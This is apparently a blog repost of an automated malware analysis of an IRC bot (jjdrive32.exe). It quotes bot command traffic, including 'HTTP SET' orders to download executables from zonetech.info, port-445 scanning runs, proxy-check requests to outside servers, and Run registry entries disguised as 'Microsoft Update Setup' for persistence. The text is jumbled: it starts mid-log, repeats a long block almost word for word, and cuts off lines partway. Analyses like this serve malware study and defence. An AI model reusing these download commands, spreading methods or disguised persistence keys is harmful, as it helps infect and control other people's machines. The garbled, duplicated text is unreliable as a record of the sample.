@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.187.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE #x -ix
MODE #ma -ix
PRIVMSG #i :HTTP SET http://zonetech.info/68.exe
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
195.190.13.163(hub.us.com)
Remote Host Port Number
112.78.219.146 80
222.76.217.154 80
195.190.13.163 47221
* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
MODE [N00_USA_XP_2766612]
@ -ix
PRIVMSG [N00_USA_XP_2766
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.207.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE #g -ix
MODE #sa -ix
PRIVMSG #r :HTTP SET http://zonetech.info/61.exe
Other details
* The following ports were open in the system:
Port Protocol Process
1053 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1056 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1057 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1087 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1464 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2264 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2265 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2266 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2267 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2268 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2269 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2270 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2271 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2272 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2273 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2274 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2275 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2276 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2277 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2278 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2279 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2280 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2281 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2282 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2283 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2284 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2285 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2286 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2287 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2288 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2289 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2290 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2291 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2292 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2293 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2294 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2295 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2296 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2297 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2298 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2299 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2300 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2301 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2302 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2303 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2304 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2305 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2306 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2307 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2308 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2309 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2310 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2311 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2312 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2313 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2314 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2315 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2316 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2317 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2318 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2319 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2320 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2321 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2322 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2323 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2324 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2325 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2326 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2327 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2328 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2329 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2330 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2331 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2332 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2333 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2334 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2335 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2336 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2337 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2338 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2339 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2340 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2341 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2342 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2343 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2344 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2345 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2346 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2347 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2348 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2349 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2350 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2351 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2352 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2353 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2354 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2355 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2356 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2357 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2358 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
Registry Modifications
* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Update Setup = "%Windir%\jjdrive32.exe"
so that jjdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Update Setup = "%Windir%\jjdrive32.exe"
so that jjdrive32.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
jjdrive32.exe %Windir%\jjdrive32.exe 339 968 bytes
* Note:
o %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows or C:\Winnt
112.78.219.146 80
222.76.217.154 80
195.190.13.163 47221
* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
MODE [N00_USA_XP_2766612]
@ -ix
PRIVMSG [N00_USA_XP_2766
@ :scan// Trying to get external IP.
@ :scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
@ :scan// Sequential Port Scan started on 192.168.207.0:445 with a delay of 5 seconds for 0 minutes using 25 threads.
MODE #g -ix
MODE #sa -ix
PRIVMSG #r :HTTP SET http://zonetech.info/61.exe
Other details
* The following ports were open in the system:
Port Protocol Process
1053 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1056 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1057 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1087 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
1464 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2264 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2265 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2266 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2267 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2268 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2269 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2270 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2271 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2272 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2273 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2274 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2275 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2276 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2277 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2278 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2279 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2280 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2281 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2282 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2283 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2284 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2285 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2286 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2287 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2288 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2289 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2290 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2291 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2292 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2293 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2294 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2295 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2296 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2297 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2298 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2299 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2300 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2301 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2302 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2303 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2304 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2305 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2306 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2307 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2308 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2309 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2310 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2311 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2312 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2313 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2314 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2315 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2316 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2317 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2318 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2319 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2320 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2321 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2322 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2323 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2324 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2325 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2326 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2327 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2328 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2329 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2330 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2331 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2332 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2333 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2334 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2335 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2336 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2337 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2338 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2339 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2340 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2341 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2342 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2343 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2344 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2345 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2346 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2347 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2348 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2349 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2350 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2351 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2352 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2353 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2354 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2355 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2356 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2357 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
2358 TCP jjdrive32.exe (%Windir%\jjdrive32.exe)
Registry Modifications
* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Update Setup = "%Windir%\jjdrive32.exe"
so that jjdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Update Setup = "%Windir%\jjdrive32.exe"
so that jjdrive32.exe runs every time Windows starts
Memory Modifications
* There was a new process created in the system:
Process Name Process Filename Main Module Size
jjdrive32.exe %Windir%\jjdrive32.exe 339 968 bytes
* Note:
o %Windir% is a variable that refers to the Windows installation folder. By default, this is C:\Windows or C:\Winnt
Inscription à :
Messages (Atom)
